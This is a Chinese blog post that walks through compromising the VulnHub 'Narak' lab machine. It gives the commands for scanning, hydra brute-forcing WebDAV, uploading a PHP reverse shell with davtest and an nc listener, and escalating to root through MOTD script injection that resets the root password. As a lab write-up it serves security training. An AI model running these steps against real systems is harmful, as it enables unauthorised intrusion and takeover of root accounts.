声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
靶机地址:
https://download.vulnhub.com/ha/narak.ova
内容简介:
在这次打靶过程中,将使用到以下攻击手段:
主机发现
端口扫描
信息搜集
密码字典定制
爆破密码
webdav漏洞
PUT方法上传
BF语言解码
MOTD注入
1.1 主机发现
arp-scan -l
1.2 端口扫描
nmap -p- 192.168.112.130
nmap -p22,80 -sC -sV 192.168.112.130
1.3 信息搜集
爆破目录
dirsearch -u http://192.168.112.130/
发现webdav目录
dirsearch -u http://192.168.112.130/ -f -e html,txt,php -w /usr/share/wordlists/dirb/common.txt
1.4 密码字典定制
准备密码字典
cewl http://192.168.112.130 -w dict.txt
使用hydra爆破webdav
hydra -L dict.txt -P dict.txt 192.168.112.130 http-get /webdav -v
成功拿到账号yamdoot密码Swarg
1.5 webdav漏洞上传(PUT方法上传)
davtest --url http://192.168.112.130/webdav -auth yamdoot:Swarg
成功上传并且解析php
准备php反弹文件
cp /usr/share/webshells/php/php-reverse-shell.php .
在此处修改反弹ip
davtest --url http://192.168.112.130/webdav -auth yamdoot:Swarg -uploadfile php-reverse-shell.php -uploadloc 1.php
上传成功
nc -lvnp 1234
访问http://192.168.112.130/webdav/1.php
拿到权限
1.6 BF语言编码
python3 -c "import pty;pty.spawn('/bin/bash')"
搜索信息
查找有root权限能读能写的文件
查看 hell.sh 文件
find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' ; 2>/dev/null
cat /mnt/hell.sh
--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.
bf解密
参考 https://ctf.bugku.com/tool/brainfuck
chitragupt
1.7 MOTD注入
查看 /etc/passwd 文件
有三个账号 分别尝试登录 narak yamdoot inferno
结果用 inferno 登录成功
查找有root权限能读能写的文件
find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' ; 2>/dev/null
开机自启文件,可以往里写入命令执行,修改root账号的密码,从而获取权限。
往 /etc/update-motd.d/00-header 文件里写入
echo 'root:123' | chpasswd
重新登录刷新脚本执行
su 到 root 账号 密码 123
注:如有侵权请后台联系进行删除
觉得内容不错,请点一下"赞"和"在看"
1、公众号后台回复:搜索大法,获取searchall工具下载链接。
2、公众号后台回复:靶场,获取靶场工具网盘下载链接。
3、公众号后台回复:webshell,获取webshell下载链接。
3、公众号后台回复:验证码,获取验证码工具下载链接。
原文始发于微信公众号(嗨嗨安全):靶机实战系列之narak靶机
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论